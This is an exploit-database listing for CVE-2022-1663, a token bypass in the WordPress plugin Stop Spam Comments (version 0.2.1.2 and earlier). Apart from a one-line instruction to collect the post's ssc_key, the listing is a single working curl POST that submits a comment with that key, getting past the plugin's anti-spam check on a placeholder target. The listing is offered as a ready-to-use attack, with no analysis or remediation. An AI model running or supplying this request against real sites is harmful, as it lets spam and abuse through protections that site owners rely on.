Exploit for Stop Spam Comments <= 0.2.1.2 - Access Token Bypass CVE-2022-1663

Name: Exploit for Stop Spam Comments <= 0.2.1.2 - Access Token Bypass CVE-2022-1663
Rating: 5 (66 reviews)

2022-08-08 | CVSS 2.0

## https://sploitus.com/exploit?id=WPEX-ID:30820BE1-E96A-4FF6-B1EC-EFDA14069E70
Collect the name and value of ssc_key for the target post and use it on the request.

curl 'http://target.tld/wp-comments-post.php' -X POST --data-raw 'ssc_key_NAME=VALUE&comment=test&author=test&email=test%40test.tld&url=&submit=Post+Comment&comment_post_ID=1&comment_parent=0'